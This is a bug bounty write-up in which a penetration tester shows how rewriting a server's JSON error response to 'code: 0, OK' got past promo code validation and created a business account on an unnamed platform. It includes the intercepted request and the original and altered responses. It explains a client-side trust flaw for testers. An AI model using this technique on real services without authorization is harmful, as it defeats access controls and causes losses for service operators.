Bypassing Promo Code Validation via Response Manipulation Enabled the Creation of a Business Account.
In the name of Allah, the Most Gracious, the Most Merciful; and peace and blessings be upon the Messenger of Allah.
We Stand with Palestine and don’t recognize a country called Israel.
Hi everyone, I’m a web penetration tester, and a part-time bug bounty hunter on HackerOne and BugCrowd.
What is response manipulation?
Response manipulation means intercepting the server's response to a client request and altering it before the client sees it, in order to change the application's behavior. By rewriting data such as status codes, error messages, or flags like "success": true, an attacker can bypass security checks, gain unauthorized access, or drive functionality to unintended outcomes. The technique only works when the client, not the server, is what enforces a decision: if a later request succeeds just because the client believed an earlier response said "OK", the server has delegated a server-side check to the client. It is a standard test during web application penetration testing.
Explanation
Since the bug is not yet resolved and it is a private bug bounty program, I will refer to the platform as example.com. Let's now walk through the functionality behind creating a business account.
While creating a normal account, I encountered a registration form that allowed me to create a business account using a valid email and password. The form then required additional information to complete the registration: First Name, Last Name, and Phone Number. After clicking Continue, it asked for Company Name, Number of Employees, and a promo code.
However, the server validated the promo code, and I had no way to obtain a valid one. I thought it might be derived from the company name, but that was rejected as invalid too.
So, I decided to intercept the request, and here’s what I found:
POST /endpoint HTTP/2
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://example.com/
Content-Type: application/json
Content-Length: 89
Origin: https://example.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers

{
  "company_name": "My Company",
  "country_code": "eg",
  "headcount": "tier4",
  "promo_code": "fake promo code"
}
I sent it to Repeater and noticed that the response carried an "Invalid promo code" message in JSON, as shown below. Note that the server answers with HTTP 200 even for the failure, so the client must be deciding what to do next from the JSON "code" field rather than from the status line:
HTTP/2 200 OK
Date: Sat, 17 Aug 2024 19:57:38 GMT
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Origin: *
Etag: W/"be-Sc9u0CHJJHAEh+ZtGA31AI1GWck"
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=<String>; path=/; expires=Sat, 17-Aug-24 20:27:38 GMT; domain=.example.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
Cf-Ray: 8b4c3bfdfd680dbf-MRS
Alt-Svc: h3=":443"; ma=86400

{
  "code": 56801,
  "message": "BUSINESS_SIGNUP_COMPANY_DATA_INVALID_REQUEST",
  "error_data": {
    "text": "Validation errors",
    "validation_errors": [
      {
        "error": "Invalid promo code",
        "property": "promo_code"
      }
    ]
  }
}
I thought about manipulating the response to bypass the error. I intercepted the request, selected Do Intercept, and chose Response to this request. Then I modified the response so that it matched the shape of a successful validation:
HTTP/2 200 OK
Date: Sat, 17 Aug 2024 19:57:38 GMT
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Origin: *
Etag: W/"be-Sc9u0CHJJHAEh+ZtGA31AI1GWck"
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=<String>; path=/; expires=Sat, 17-Aug-24 20:27:38 GMT; domain=.example.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
Cf-Ray: 8b4c3bfdfd680dbf-MRS
Alt-Svc: h3=":443"; ma=86400

{
  "code": 0,
  "message": "OK"
}
Oops, I successfully bypassed it and created the account.